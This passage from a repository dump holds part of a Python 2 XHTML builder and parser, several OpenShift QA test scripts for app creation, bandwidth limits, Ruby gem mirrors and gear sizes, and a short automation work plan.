instance.\"\n\nclass XHTMLCOMMENT(POM.Comment):\n\tpass\n\nclass XHTMLElement(POM.ElementNode):\n\tpass\n\nclass XHTMLDocument(POM.POMDocument):\n\t\"\"\"XHTMLDocument(doctype)\n\tdoctype must be one of: STRICT, TRANSITIONAL, or FRAMESET.\n\t\"\"\"\n\tdef __init__(self, doctype=None, lang=\"en\", encoding=None):\n\t\tsuper(XHTMLDocument, self).__init__(encoding=encoding)\n\t\tself.lang = lang\n\t\tif doctype: # implies new document \n\t\t\tself.set_doctype(doctype)\n\t\t\tself.root = self.dtd.Html()\n\t\t\tself.root.set_namespace(None) # XHTML tags have no namespace\t\n\t\t\tself.head = self.root.add(self.dtd.Head)\n\t\t\tself.body = self.root.add(self.dtd.Body)\n\t\n\t# helpers for adding specific elements\n\tdef _set_title(self, title):\n\t\tti = self.head.add(self.dtd.Title)\n\t\tti.append(POM.Text(title))\n\tdef _get_title(self):\n\t\treturn self.getnode(\"/html/head/title\")\n\ttitle = property(_get_title, _set_title)\n\n\tdef _set_stylesheet(self, url):\n\t\tself.head.add(self.dtd.Link, rel=\"stylesheet\", type=\"text/css\", href=url)\n\tdef _get_stylesheet(self):\n\t\treturn self.getnode(\"/html/head/link\")\n\tstylesheet = property(_get_stylesheet, _set_stylesheet)\n\n\tdef set_root(self, rootnode):\n\t\tself.root = rootnode\n\t\tself.root.xmlns = NAMESPACE\n\t\tself.root.set_namespace(None)\n\t\tself.head = self.root[\"head\"]\n\t\tself.body = self.root[\"body\"]\n\n\tdef set_doctype(self, doctype):\n\t\tself.DOCTYPE = DOCTYPES[doctype]\n\t\tself.dtd = get_dtd_module(doctype)\n\t\tself.add_dtd(self.dtd)\n\n\tdef get_parser(self):\n\t\treturn XHTMLParser(self)\n\t\n\t# general add methods\n\tdef add_to_head(self, obj, **kwargs):\n\t\tif type(obj) is str:\n\t\t\tobj = getattr(self.dtd, obj)\n\t\treturn apply(self.head.add, (obj,), 
kwargs)\n\t\n\tdef add(self, obj, **kwargs):\n\t\tif type(obj) is str:\n\t\t\tobj = getattr(self.dtd, obj)\n\t\treturn self.body.add(obj, **kwargs)\n\n\tdef append(self, obj, **kwargs):\n\t\tif type(obj) is str:\n\t\t\tobj = self.get_element(obj, **kwargs)\n\t\tself.body.append(obj)\n\t\n\tdef insert(self, ind, obj, **kwargs):\n\t\tif type(obj) is str:\n\t\t\tobj = self.get_element(obj, **kwargs)\n\t\tself.body.insert(ind, obj)\n\n\t# generic element factory\n\tdef get_element(self, name, **kwargs):\n\t\tcl = getattr(self.dtd, name)\n\t\tinst = apply(cl, (), kwargs)\n\t\tinst.set_namespace(None)\n\t\treturn inst\n\n\tdef __setitem__(self, ind, obj):\n\t\tself.body[ind] = obj\n\tdef __getitem__(self, ind):\n\t\treturn self.body[ind]\n\tdef __delitem__(self, ind):\n\t\tdel self.body[ind]\n\n\tdef get_para(self, **attribs):\n\t\tPara = newclass(\"Para\", ParaMixin, self.dtd.P)\n\t\tp = Para(**attribs)\n\t\tp._init(self.dtd)\n\t\treturn p\n\n\tdef add_para(self, text, **attribs):\n\t\tp = self.get_para(**attribs)\n\t\tt = check_object(text)\n\t\tp.append(t)\n\t\tself.append(p)\n\t\treturn p\n\t\n\tdef add_header(self, level, text):\n\t\thobj = self.get_element(\"H%d\" % (level))\n\t\thobj.append(POM.Text(text))\n\t\tself.body.append(hobj)\n\n\tdef get_unordered_list(self, **attribs):\n\t\tUnordered = newclass(\"Unordered\", ListMixin, self.dtd.Ul)\n\t\tul = Unordered(**attribs)\n\t\tul._init(self.dtd)\n\t\treturn ul\n\n\tdef add_unordered_list(self, items):\n\t\tul = self.dtd.Ul()\n\t\tfor item in items:\n\t\t\tli = ul.add(self.dtd.Li)\n\t\t\tli.append(check_object(item))\n\t\tself.body.append(ul)\n\t\treturn ul\n\t\n\tdef add_ordered_list(self, items):\n\t\tol = self.dtd.Ol()\n\t\tfor item in items:\n\t\t\tli = ol.add(self.dtd.Li)\n\t\t\tli.append(check_object(item))\n\t\treturn ol\n\n\tdef add_anchor(self, obj=\"\", **attribs):\n\t\tA = apply(self.dtd.A, (), attribs)\n\t\tself.body.append(A)\n\t\tif type(obj) is str:\n\t\t\tA.append(POM.Text(obj))\n\t\telse:\n\t\t\tA.append(obj)\n\t\treturn A\n\n\tdef add_comment(self, text):\n\t\tcomment = XHTMLCOMMENT(text)\n\t\tself.body.append(comment)\n\n\tdef add_division(self, **attribs):\n\t\tdiv = self.dtd.Div(**attribs)\n\t\tself.body.append(div)\n\t\treturn div\n\t\n\tdef get_table(self, **kwargs):\n\t\tXHTMLTable = newclass(\"XHTMLTable\", TableMixin, self.dtd.Table)\n\t\tt= XHTMLTable(**kwargs)\n\t\tt._init(self.dtd)\n\t\treturn t\n\n\tdef add_table(self, **kwargs):\n\t\tt = self.get_table(**kwargs)\n\t\tself.append(t)\n\t\treturn t\n\n\tdef get_form(self, **kwargs):\n\t\tXHTMLForm = newclass(\"XHTMLForm\", FormMixin, self.dtd.Form)\n\t\t# instance of new class, with mixin\n\t\tf = XHTMLForm(**kwargs)\n\t\tf._init(self.dtd)\n\t\t#f.enctype=\"application/x-www-form-urlencoded\"\n\t\tf.enctype=\"multipart/form-data\"\n\t\treturn f\n\n\tdef add_form(self, **kwargs):\n\t\tf = self.get_form(**kwargs)\n\t\tself.append(f)\n\t\treturn f\n\n\tdef get_area(self, **kwargs):\n\t\tArea = newclass(\"Area\", DivMixin, self.dtd.Div)\n\t\tarea = Area(**kwargs)\n\t\tarea._init(self.dtd)\n\t\treturn area\n\n\tdef add_area(self, **kwargs):\n\t\tar = self.get_area(**kwargs)\n\t\tself.append(ar)\n\t\treturn ar\n\n\n# container for inline markup\nclass InlineMixin(object):\n\tdef _init(self, dtd):\n\t\tself.dtd = dtd\n\n\tdef inline(self, name, obj, **attribs):\n\t\tobj = check_object(obj)\n\t\tilmc = getattr(self.dtd, name)\n\t\tInline = newclass(\"Inline\", ilmc, InlineMixin)\n\t\til = Inline(**attribs)\n\t\til.append(obj)\n\t\tself.append(il)\n\t\treturn 
il\n\n\tdef text(self, text):\n\t\treturn self.add_text(\" \"+str(text))\n\n\tdef bold(self, obj, **attribs):\n\t\treturn self.inline(\"B\", obj, **attribs)\n\n\tdef italic(self, obj, **attribs):\n\t\treturn self.inline(\"I\", obj, **attribs)\n\n\tdef teletype(self, obj, **attribs):\n\t\treturn self.inline(\"Tt\", obj, **attribs)\n\n\tdef big(self, obj, **attribs):\n\t\treturn self.inline(\"Big\", obj, **attribs)\n\n\tdef small(self, obj, **attribs):\n\t\treturn self.inline(\"Small\", obj, **attribs)\n\n\tdef em(self, obj, **attribs):\n\t\treturn self.inline(\"Em\", obj, **attribs)\n\n\tdef strong(self, obj, **attribs):\n\t\treturn self.inline(\"Strong\", obj, **attribs)\n\n\tdef dfn(self, obj, **attribs):\n\t\treturn self.inline(\"Dfn\", obj, **attribs)\n\n\tdef code(self, obj, **attribs):\n\t\treturn self.inline(\"Code\", obj, **attribs)\n\n\tdef quote(self, obj, **attribs):\n\t\treturn self.inline(\"Q\", obj, **attribs)\n\tQ = quote\n\n\tdef sub(self, obj, **attribs):\n\t\treturn self.inline(\"Sub\", obj, **attribs)\n\n\tdef sup(self, obj, **attribs):\n\t\treturn self.inline(\"Sup\", obj, **attribs)\n\n\tdef samp(self, obj, **attribs):\n\t\treturn self.inline(\"Samp\", obj, **attribs)\n\n\tdef kbd(self, obj, **attribs):\n\t\treturn self.inline(\"Kbd\", obj, **attribs)\n\n\tdef var(self, obj, **attribs):\n\t\treturn self.inline(\"Var\", obj, **attribs)\n\n\tdef cite(self, obj, **attribs):\n\t\treturn self.inline(\"Cite\", obj, **attribs)\n\n\tdef abbr(self, obj, **attribs):\n\t\treturn self.inline(\"Abbr\", obj, **attribs)\n\n\tdef acronym(self, obj, **attribs):\n\t\treturn self.inline(\"Acronym\", obj, **attribs)\n\n\nParaMixin = InlineMixin\n\nclass ListMixin(object):\n\tdef _init(self, dtd):\n\t\tself.dtd = dtd\n\tdef add_item(self, obj, **attribs):\n\t\tobj = check_object(obj)\n\t\tilmc = getattr(self.dtd, \"Li\")\n\t\tItem = newclass(\"Item\", ilmc, InlineMixin)\n\t\til = Item(**attribs)\n\t\til.append(obj)\n\t\tself.append(il)\n\t\treturn il\n\n\n# Special support methods for XHTML tables. The makes it easy to produce simple\n# tables. easier to produce more complex tables. But it currently does not\n# support advanced table features. It allows setting cells by row and column\n# index (using a sparse table). 
The special emit method constructs the row\n# structure on the fly.\nclass TableMixin(object):\n\t# set document dtd so methods can access it to create sub-elements\n\tdef _init(self, dtd):\n\t\tself.dtd = dtd\n\t\tself._t_caption = None # only one\n\t\tself._headings = None\n\t\tself._t_rows = []\n\n\tdef caption(self, content, **kwargs):\n\t\t# enforce the rule that there is only one caption, and it is first\n\t\t# element in the table.\n\t\tcap = self.dtd.Caption(**kwargs)\n\t\tcap.append(check_object(content))\n\t\tself._t_caption = cap\n\n\tdef get_headings(self):\n\t\treturn self._headings # a row (tr) object.\n\n\tdef set_heading(self, col, val):\n\t\t\"\"\"Set heading at column <col> (origin 1) to <val>.\"\"\"\n\t\tval = check_object(val)\n\t\tif not self._headings:\n\t\t\tself._headings = self.dtd.Tr()\n\t\t# auto-fill intermediate cells, if necessary.\n\t\tfor inter in range(col - len(self._headings)):\n\t\t\tself._headings.append(self.dtd.Th())\n\t\tth = self._headings[col-1]\n\t\tth.append(val)\n\t\treturn th # so you can set attributes...\n\n\tdef set(self, col, row, val):\n\t\tval = check_object(val)\n\t\tfor inter in range(row - len(self._t_rows)):\n\t\t\tself._t_rows.append( self.dtd.Tr())\n\t\tr = self._t_rows[row-1]\n\t\tfor inter in range(col - len(r)):\n\t\t\tr.append( self.dtd.Td())\n\t\ttd = r[col-1]\n\t\ttd.append(val)\n\t\treturn td\n\n\tdef get(self, col, row):\n\t\tr = self._t_rows[row-1]\n\t\treturn r[col-1]\n\n\tdef delete(self, col, row):\n\t\tr = self._t_rows[row-1]\n\t\tdel r[col-1]\n\t\tif len(r) == 0:\n\t\t\tdel self._t_rows[row-1]\n\n\tdef emit(self, fo):\n\t\tself._verify_attributes()\n\t\tfo.write(\"<%s%s%s>\" % (self._get_ns(), self._name, self._attr_str()))\n\t\tif self._t_caption:\n\t\t\tself._t_caption.emit(fo)\n\t\tif self._headings:\n\t\t\tself._headings.emit(fo)\n\t\tfor row in self._t_rows:\n\t\t\trow.emit(fo)\n\t\tfo.write(\"</%s%s>\" % (self._get_ns(), self._name))\n\n\nclass FormMixin(object):\n\tdef _init(self, dtd):\n\t\tself.dtd = dtd\n\t\n\tdef get_textarea(self, text, name=None, rows=4, cols=60):\n\t\ttext = check_object(text)\n\t\ttextclass = newclass(\"TextWidget\", TextareaMixin, self.dtd.Textarea)\n\t\tta = textclass(name=name, rows=rows, cols=cols)\n\t\tta.append(text)\n\t\treturn ta\n\n\tdef add_textarea(self, text, name=None, rows=4, cols=60):\n\t\tta = self.get_textarea(text, name, rows, cols)\n\t\tself.append(ta)\n\t\treturn ta\n\t\n\tdef get_input(self, **kwargs):\n\t\tinputclass = newclass(\"InputWidget\", InputMixin, self.dtd.Input)\n\t\tinp = inputclass(**kwargs)\n\t\treturn inp\n\t\n\tdef add_input(self, **kwargs):\n\t\tinp = self.get_input(**kwargs)\n\t\tself.append(inp)\n\t\treturn inp\n\n\tdef add_textinput(self, name, label=None, size=30, default=None, maxlength=None):\n\t\tif label:\n\t\t\tlbl = self.dtd.Label()\n\t\t\tsetattr(lbl, \"for\", name) # 'for' is a keyword...\n\t\t\tlbl.append(check_object(label))\n\t\t\tself.append(lbl)\n\t\tself.append(self.dtd.Input(type=\"text\", name=name, value=default, \n\t\t\t\tmaxlength=maxlength))\n\n\tdef get_select(self, items, **kwargs):\n\t\tsl = self.dtd.Select(**kwargs)\n\t\tfor item in items:\n\t\t\topt = self.dtd.Option()\n\t\t\topt.append(POM.Text(str(item)))\n\t\t\tsl.append(opt)\n\t\treturn sl\n\n\tdef add_select(self, items, **kwargs):\n\t\tsl = self.get_select( items, **kwargs)\n\t\tself.append(sl)\n\t\treturn sl\n\n\tdef add_radiobuttons(self, name, items, vertical=False):\n\t\tfor i, item in enumerate(items):\n\t\t\tself.append(self.dtd.Input(type=\"radio\", 
name=name, value=i))\n\t\t\tself.append(check_object(item))\n\t\t\tif i == 0:\n\t\t\t\tself[-2].checked = TRUE # default to first one checked\n\t\t\tif vertical:\n\t\t\t\tself.append(self.dtd.Br())\n\n\tdef add_checkboxes(self, name, items, vertical=False):\n\t\tfor i, item in enumerate(items):\n\t\t\tself.append(self.dtd.Input(type=\"checkbox\", name=name, value=i))\n\t\t\tself.append(check_object(item))\n\t\t\tif vertical:\n\t\t\t\tself.append(self.dtd.Br())\n\n\tdef add_fileinput(self, name=\"fileinput\", default=None):\n\t\tself.append(self.dtd.Input(type=\"file\", name=name, value=default))\n\n\nclass WidgetBase(object):\n\tpass\n\nclass StringWidget(WidgetBase):\n\tpass\n\nclass PasswordWidget(StringWidget):\n\tpass\n\nclass TextareaMixin(WidgetBase):\n\tpass\n\nclass InputMixin(WidgetBase):\n\t\"\"\"type = (text | password | checkbox | radio | submit | reset |\n file | hidden | image | button) \"\"\"\n\tpass\n\n# container for other objects (Div) for layout purposes\n# Use CSS to define the area properties.\nclass DivMixin(object):\n\tdef _init(self, dtd):\n\t\tself.dtd = dtd\n\n\n# XHTML POM parser. This parser populates the POM with XHTML objects, so this\n# HTML parser essentially translates HTML to XHTML, hopefully with good\n# results.\nclass XHTMLParser(HTMLParser.HTMLParser):\n\tdef __init__(self, doc):\n\t\tself.reset()\n\t\tself.topelement = None\n\t\tself.doc=doc\n\t\tself.stack = []\n\n\tdef close(self):\n\t\tif self.stack:\n\t\t\traise POM.ValidationError, \"XHTML document has unmatched tags\"\n\t\tHTMLParser.HTMLParser.close(self)\n\t\tself.doc.set_root(self.topelement)\n\n\tdef parse(self, url):\n\t\timport urllib\n\t\tfo = urllib.urlopen(url)\n\t\tself.parseFile(fo)\n\t\tself.close()\n\t\t\n\tdef parseFile(self, fo):\n\t\tdata = fo.read(16384)\n\t\twhile data:\n\t\t\tself.feed(data)\n\t\t\tdata = fo.read(16384)\n\t\tself.close()\n\n\tdef _get_tag_obj(self, tag, attrs):\n\t\tattrdict = {}\n\t\tdef fixatts(t):\n\t\t\tattrdict[t[0]] = t[1]\n\t\tmap(fixatts, attrs)\n\t\tcl = getattr(self.doc.dtd, identifier(tag))\n\t\tcl.__bases__ = (XHTMLElement,) # XXX quck hack\n\t\tobj = apply(cl, (), attrdict)\n\t\treturn obj\n\n\tdef handle_starttag(self, tag, attrs):\n\t\tobj = self._get_tag_obj(tag, attrs)\n\t\tif obj.CONTENTMODEL.is_empty():\n\t\t\tself.stack[-1].append(obj)\n\t\t\treturn\n\t\tif not self.stack:\n\t\t\tobj.set_namespace(None)\n\t\tself.stack.append(obj)\n\n\tdef handle_endtag(self, tag):\n\t\t\"Handle an event for the end of a tag.\"\n\t\tobj = self.stack.pop()\n\t\tif self.stack:\n\t\t\tself.stack[-1].append(obj)\n\t\telse:\n\t\t\tself.topelement = obj\n\t\n\tdef handle_startendtag(self, tag, attrs):\n\t\tobj = self._get_tag_obj(tag, attrs)\n\t\tself.stack[-1].append(obj)\n\t\t\n\tdef handle_data(self, data):\n\t\tif self.stack:\n\t\t\tself.stack[-1].add_text(data)\n\t\telse:\n\t\t\t#print >>sys.stderr, \"XHTMLParser: kruft warning: %s: %r\" % (self.getpos(), data,)\n\t\t\tpass\n\t\n\tdef handle_charref(self, name):\n\t\tprint >>sys.stderr, \"!!! 
unhandled charref:\", repr(name)\n\t\n\tdef handle_entityref(self, name):\n\t\tif self.stack:\n\t\t\tself.stack[-1].add_text(entitydefs[name])\n\n\tdef handle_comment(self, data):\n\t\tself.stack[-1].append(POM.Comment(data))\n\n\tdef handle_decl(self, decl):\n\t\tif decl.startswith(\"DOCTYPE\"):\n\t\t\tif decl.find(\"Strict\") > 1:\n\t\t\t\tself.doc.set_doctype(STRICT)\n\t\t\telif decl.find(\"Frameset\") > 1:\n\t\t\t\tself.doc.set_doctype(FRAMESET)\n\t\t\telif decl.find(\"Transitional\") > 1:\n\t\t\t\tself.doc.set_doctype(TRANSITIONAL)\n\t\t\telse:\n\t\t\t\traise POM.ValidationError, \"unknown DOCTYPE: %r\" % (decl,)\n\t\telse:\n\t\t\tprint >>sys.stderr, \"!!! Unhandled decl: %r\" % (decl,)\n\n\tdef handle_pi(self, data):\n\t\t'xml version=\"1.0\" encoding=\"ISO-8859-1\"?'\n\t\tmo = re.match('xml version=\"([0123456789.]+)\" encoding=\"([A-Z0-9-]+)\"', data, re.IGNORECASE)\n\t\tif mo:\n\t\t\tversion, encoding = mo.groups()\n\t\t\tassert version == \"1.0\"\n\t\t\tself.doc.set_encoding(encoding)\n\t\telse:\n\t\t\tprint >>sys.stderr, \"!!! Unhandled pi: %r\" % (data,)\n\n\ndef new_document(doctype):\n\tdoc = XHTMLDocument(doctype)\n\treturn doc\n\ndef get_document(url):\n\tdoc = XHTMLDocument()\n\tp = doc.get_parser()\n\tp.parse(url)\n\treturn doc\n\n\nif __name__ == \"__main__\":\n\timport os\n\tos.system(\"qaunittest xhtml\")\n\n" }, { "alpha_fraction": 0.618573784828186, "alphanum_fraction": 0.6202321648597717, "avg_line_length": 22.647058486938477, "blob_id": "d996eb3658f1acbf1417b9bded9684c4dac86334", "content_id": "f353ac4f94d811bd8276ba1b071dd1708fbb9601", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1206, "license_type": "no_license", "max_line_length": 90, "num_lines": 51, "path": "/automation/open/testmodules/Collections/RunTests.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\n\"\"\"\nimport rhtest\nimport tcms_base\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\n\nclass OpenShiftTest(rhtest.Test):\n\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\nclass RunTests(OpenShiftTest):\n def test_method(self):\n return self.passed(\"test passed.\")\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n if conf.options.TCMS:\n tests = conf.tcms_obj.get_testscripts_by_tag(conf.tcms_tag)\n else:\n # user specified the tag file from a json file\n tests = rhtest.extract_tests_from_json_file(conf.options.json_file)\n #tests, variant_map = rhtest.extract_tests_from_json_file(conf.options.json_file)\n #conf['testcase_variants_map'] = variant_map\n suite.add_test(RunTests)\n i = 0\n for test, args in tests:\n i += 1\n try:\n klass = rhtest.convert_script_to_cls(test)\n print \"KLASS: %s\" % klass\n suite.add_test(klass, args)\n except:\n print \"Failed to import test '%s'\" % test\n pass\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5576726794242859, "alphanum_fraction": 0.5702620148658752, "avg_line_length": 27.8137264251709, "blob_id": "a1dacfb46449fc7c26da04afe3d1be1a0df915f2", "content_id": "a591f3b2d3554ecb483803b4db4500e581ad1997", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2939, "license_type": "no_license", "max_line_length": 129, "num_lines": 102, "path": "/automation/open/testmodules/RT/limits/mod_bw.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": 
"#!/usr/bin/env python\nimport os, sys\n\nimport testcase\nimport common\nimport rhtest\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.app_name = common.getRandomString(10)\n self.app_type = common.app_types['php']\n self.file_size = 2048\n self.bw_limit = 500000\n tcms_testcase_id=122197\n\n \tcommon.env_setup()\n self.steps_list = []\n\n def finalize(self):\n common.destroy_app(self.app_name)\n os.system(\"rm -Rf %s\" % ( self.app_name ))\n\n\nclass ModBw(OpenShiftTest):\n def check_bandwidth(self, bandwidth):\n print \"The download speed is: %s\" % bandwidth\n if float(bandwidth) < self.bw_limit:\n return 0\n return 1\n\n def test_method(self):\n #1\n step = testcase.TestCaseStep(\n \"Create an %s app: %s\" % (self.app_type, self.app_name),\n common.create_app,\n function_parameters = [self.app_name, self.app_type],\n expect_description = \"App should be created successfully\",\n expect_return = 0)\n self.steps_list.append(step)\n\n #2\n step = testcase.TestCaseStep(\n \"generate a %dK size file\"% self.file_size,\n \"dd if=/dev/zero bs=1K count=%d of=%s/php/tmp.html\"% (self.file_size, self.app_name),\n expect_return = 0)\n self.steps_list.append(step)\n\n #3\n step = testcase.TestCaseStep(\n \"Git push codes\",\n \"cd %s && git add . && git commit -am 'update app' && git push\" % self.app_name,\n expect_return = 0)\n self.steps_list.append(step)\n\n #4\n step = testcase.TestCaseStep(\n \"get app URL\",\n common.get_app_url_from_user_info,\n function_parameters = [self.app_name])\n self.steps_list.append(step)\n\n #5\n step = testcase.TestCaseStep(\n \"check feedback\",\n \"curl --fail --silent --max-time 300 -o /dev/null -w %{speed_download} -H 'Pragma: no-cache' __OUTPUT__[4]/tmp.html\",\n expect_return = 0)\n self.steps_list.append(step)\n\n #6\n step = testcase.TestCaseStep(\n \"check the bandwidth\",\n self.check_bandwidth,\n function_parameters = ['__OUTPUT__[5]'],\n expect_return = 0)\n \n\n case = testcase.TestCase(\"[rhc-limits] apache bandwidth limit\", self.steps_list)\n case.run()\n\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(ModBw)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5810493230819702, "alphanum_fraction": 0.5916209816932678, "avg_line_length": 32.155845642089844, "blob_id": "98f5fc007a8f4869a8aa228810f2c4897ebb468f", "content_id": "241713c5dbaa36a5fb29b5b97c1a08ad5a22fe31", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2554, "license_type": "no_license", "max_line_length": 132, "num_lines": 77, "path": "/automation/open/testmodules/RT/cartridge/local_lib_mirrors_ruby.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nLinqing Lu\[email protected]\nDec 12, 2011\n\n[US1343][Runtime][cartridge] Create local lib mirrors for Ruby framework\nhttps://tcms.engineering.redhat.com/case/121925/\n\"\"\"\nimport os,sys,re\n\nimport testcase, common\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[US1343][Runtime][cartridge] Create local lib mirrors for Ruby 
framework\"\n self.app = { 'name':'rubytest', 'type':common.app_types['ruby'] }\n self.steps_list = []\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app['name']))\n\nclass LocalLibMirrorsRuby(OpenShiftTest):\n def test_method(self):\n self.steps_list.append(testcase.TestCaseStep(\n \"Create an %s app: %s\" % (self.app['type'],self.app['name']),\n common.create_app,\n function_parameters = [self.app['name'], self.app['type']],\n expect_description = \"App should be created successfully\",\n expect_return = 0))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Create new rails app\",\n \"rails new %s -f\" % self.app['name'],\n expect_return = 0))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Create new rails app, and bundle check\",\n \"cd %s && sed -i 's,rubygems.org,mirror1.prod.rhcloud.com/mirror/ruby,' Gemfile && bundle check\" % self.app['name'],\n expect_return = 0))\n\n self.steps_list.append( testcase.TestCaseStep(\n \"Git push codes\",\n \"cd %s && git add . && git commit -am test && git push\" % self.app['name'],\n expect_string_list = ['Installing rack', 'Fetching source index for http.*ruby'],\n expect_return = 0))\n\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(LocalLibMirrorsRuby)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5664030313491821, "alphanum_fraction": 0.5699481964111328, "avg_line_length": 34.25, "blob_id": "ce81c29734e9766180ebf427cb93dda55d5ad17a", "content_id": "82bb4f51be9add97c2c3ebeddf6ea42389e588fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3667, "license_type": "no_license", "max_line_length": 167, "num_lines": 104, "path": "/automation/open/testmodules/RT/node/pick_gear_size.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nAttila Nagy\[email protected]\n\n[US1373][UI][CLI] Pick gear size\n\"\"\"\n\nimport sys\nimport subprocess\nimport os\n\nimport rhtest\nimport testcase\nimport common\nimport OSConf\n\nclass OpenShiftTest(rhtest.Test):\n ITEST = [ \"DEV\" ]\n def initialize(self):\n self.summary = \"[US1373][UI][CLI] Pick gear size\"\n try:\n self.app_type = self.config.test_variant\n except:\n self.app_type = 'jbossas'\n self.app_name = \"my%s%s\" % ( self.app_type, common.getRandomString() )\n self.steps_list = []\n\n common.env_setup()\n if self.get_run_mode() == \"DEV\":\n common.add_gearsize_capability('medium')\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n if self.get_run_mode() == \"DEV\":\n common.remove_gearsize_capability('medium')\n \nclass PickGearSize(OpenShiftTest):\n #\n # With current framework it's almost impossible to implement\n #\n # In order to create medium / large gear-sized application \n # I need a devenv instance with medium / large profile\n #\n # Waiting for the final implementation of the new framework\n #\n #for gear_size in [ 'small', 'medium', 'large' ]:\n # # Creating the application\n # 
steps.append(testcase.TestCaseStep(\n # \"Creating application with gear size '%s'\" % ( gear_size ),\n # \"rhc app create -a %s -t %s -g %s -l %s -p %s -n\" % ( self.app_name, common.self.app_types[self.app_type], gear_size, self.user_email, self.user_passwd ),\n # expect_description = \"The application must be created successfully with the given gear size\",\n # expect_return = 0 \n # ))\n #\n # \n # # Destroying the application\n # steps.append(testcase.TestCaseStep(\n # \"Destroying the application with gear size '%s'\" % ( gear_size ),\n # \"rhc app destroy -a %s -b -l %s -p %s\" % ( self.app_name, self.user_email, self.user_passwd ),\n # expect_description = \"The application must be destroyed successfully\",\n # expect_return = 0 \n # ))\n \n def test_method(self):\n self.steps_list.append(testcase.TestCaseStep(\n \"Creating application with a not supported gear size\",\n \"rhc app create %s %s -g %s -l %s -p %s --no-git %s\" \n % (self.app_name, \n common.app_types[self.app_type],\n common.get_domain_name(), self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd,\n common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description = \"The application must not be created\",\n expect_return = \"!0\"))\n \n case = testcase.TestCase(\n self.summary, \n self.steps_list,\n clean_up_function_parameters = [ self.config.OPENSHIFT_user_email, False ]) # Reverting to False to not bother other test-cases)\n\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(PickGearSize)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.664814829826355, "alphanum_fraction": 0.6870370507240295, "avg_line_length": 25.950000762939453, "blob_id": "c214138b4be696bbf78049ab408513786049a1ea", "content_id": "2730827ae46092e13dee184fca5bcbb8c651952c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 540, "license_type": "no_license", "max_line_length": 52, "num_lines": 20, "path": "/automation/auto_plan_201306.md", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "Tools Automation Work Plan\n===========================\n\n\n* Framework 2~3 weeks\n - improve and complete the framework.\n - draft tools automation conventions and rules. \n - move the git repo to code.engineering.redhat.com\n\n* Example & Talking 1~2 weeks\n - write a demo or some typical examples.\n - give a tech talk about tools automation.\n\n* Beaker Automation 7~11 weeks\n - write library, keywords, resources. 1~2 weeks\n - write high-level cases. 5~8 weeks\n - integrate test all automated cases. 
